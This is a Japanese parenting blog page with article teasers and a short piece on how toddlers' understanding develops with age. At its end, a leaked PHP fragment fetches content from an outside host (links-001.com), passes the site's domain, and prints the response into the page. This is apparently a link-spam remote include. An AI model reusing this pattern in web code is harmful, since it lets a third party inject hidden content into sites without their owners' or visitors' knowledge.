前へ
次へ

成績優秀な子供は早朝と夕方の時間を上手に活用

子供の将来のためにも教育熱心な家庭はありますし、実際に勉強はしておいて損はありません。
学校で

more

教育ローンを組めないときはどうしたら良いか

教育機関を使って何かを学びたいと思ったときには教育ローンを使えるのが一般的です。
子供や孫の学

more

子供の教育の大切さを知りたい方へ

子供を教育していく際、とても大切な事があります。
それは、小さいときに両親がしっかりとスキンシ

more

乳幼児期の子供の理解力は年齢により異なるもの

まだ乳幼児期のキッズたちは外への世界への関心が非常に高く、少しでも世界が広がると手で触れたり見たりしたい時期です。
大人のように広い視野を持って見通す力も無ければ、目の前にあるものが全てですから、手あたり次第触っては口に入れてしまいます。
可愛い子供のすることであっても親としては、びっくりするような行動を起こすのもこの時期であり、つい叱ってばかりで自己嫌悪に陥る親も少なくはありません。
心配だからこそ叱ってしまいますが、教育の在り方として親としても悩ましい部分です。
実際にどれくらいの理解力を乳幼児期のキッズたちは持ち合わせているのか、不安だからこそ叱ってしまうのをどうしたらいのか、悩んであらゆる対策で対処をしていきます。
理解力に関しては年齢が上がるほど深まっていますので、叱られたらなぜかを理解ができるのは、3歳から4歳あたりになってからです。
子供の理解できる年齢を知るだけでも、親としては対処も違ってきますし、親側も自分をあまり責めることはありません。

".file_get_contents('http://links-001.com/kanren4set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top